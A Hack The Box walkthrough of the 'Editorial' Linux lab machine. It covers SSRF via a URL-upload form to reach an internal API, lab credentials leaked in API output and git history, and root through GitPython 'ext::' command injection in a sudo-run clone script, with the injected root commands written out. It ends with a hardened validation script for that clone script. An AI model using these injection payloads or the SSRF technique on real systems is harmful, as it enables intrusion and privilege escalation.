Hack The Box / LINUX / 2026-03-27
Hack The Box - Editorial (Linux)
SSRF in file upload reaches internal API, leaked credentials enable SSH pivot, and GitPython CVE abuse in sudo script yields root.
Target
- IP: 10.129.177.192
Recon
sudo nmap -sC -sV 10.129.177.192 -p- -T5 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add editorial.htb to /etc/hosts.
SSRF Discovery
Browse to http://editorial.htb/upload.
The page accepts a URL, and the server issues an HTTP request to it.
Observed header:
User-Agent: python-requests/2.25.1
Because the server fetches a user-supplied URL on its own behalf, the endpoint is vulnerable to SSRF.
Internal Port Discovery
Use the attached script:
attachments/brute_ports.py
python3 attachments/brute_ports.py
Port 5000 is open
Retrieve internal API content using:
attachments/get_page.py
python3 attachments/get_page.py | jq .
The response lists some API endpoints.
python3 attachments/get_page.py api/latest/metadata/messages/authors
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
User Pivot
ssh dev@editorial.htb
Use password:
dev080217_devAPI!@
There is an apps directory containing a .git folder.
Download it and inspect the commit history (for example in VS Code). In the commit "feat: create api to editorial info", the file app_api/app.py contains:
Username: prod
Password: 080217_Producti0n_2023!@
Connect with the prod account via SSH.
Privilege Escalation
sudo -l
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
Relevant vulnerability:
https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858
Check version:
python3
>>> import git
>>> git.__version__
'3.1.29'
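This version is vulnerable. The script also passes -c protocol.ext.allow=always to the clone, so a URL using git's ext:: transport runs the given command, here as root through sudo.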
Exploit command execution:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c touch% /tmp/pwned'
Copy root flag:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cp% /root/root.txt% /tmp'
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% o+r% /tmp/root.txt'
cat /tmp/root.txt
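Hardening the sudo script: the following is an added example, not code from the box or from GitPython, showing how clone_prod_change.py could validate its argument before cloning. It calls the git CLI through subprocess instead of GitPython, and the HTTPS-only policy and the host git.example.internal are assumptions chosen for illustration.

```python
#!/usr/bin/python3
# Added example: hardened variant of clone_prod_change.py (not the original script).
import subprocess
import sys
from urllib.parse import urlsplit

CLONE_DIR = "/opt/internal_apps/clone_changes"  # directory used by the page's script
ALLOWED_SCHEMES = {"https"}                     # assumption: only HTTPS remotes are needed
ALLOWED_HOSTS = {"git.example.internal"}        # hypothetical allowlist of trusted Git servers


class RejectedURL(ValueError):
    """Raised when a clone URL fails validation."""


def validate_clone_url(url):
    """Return url unchanged if it is an https:// URL on an allowlisted host."""
    # Whitespace or control characters never belong in a clone URL, and a
    # leading '-' would be read by git as a command-line option.
    if not url or url.startswith("-") or any(c.isspace() or ord(c) < 0x20 for c in url):
        raise RejectedURL("malformed URL")
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError as exc:
        raise RejectedURL("unparseable URL") from exc
    # "ext::<command>" parses with scheme "ext", so the scheme allowlist rejects
    # git remote helpers along with file://, ssh:// and everything else.
    if parts.scheme not in ALLOWED_SCHEMES:
        raise RejectedURL(f"scheme {parts.scheme!r} not allowed")
    if host not in ALLOWED_HOSTS:
        raise RejectedURL(f"host {host!r} not allowed")
    return url


def build_clone_command(url, dest="new_changes"):
    """Build the git argv: helpers disabled at the git layer too, URL after '--'."""
    return ["git",
            "-c", "protocol.allow=never",         # default-deny every transport
            "-c", "protocol.https.allow=always",  # then allow only https
            "clone", "--", validate_clone_url(url), dest]


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: clone_prod_change.py <https-url>")
    try:
        cmd = build_clone_command(sys.argv[1])
    except RejectedURL as err:
        sys.exit(f"refusing to clone: {err}")
    subprocess.run(cmd, cwd=CLONE_DIR, check=True)
```

Tightening the sudoers entry so it no longer ends in a bare * and upgrading GitPython past the vulnerable release close the same path from the other two sides.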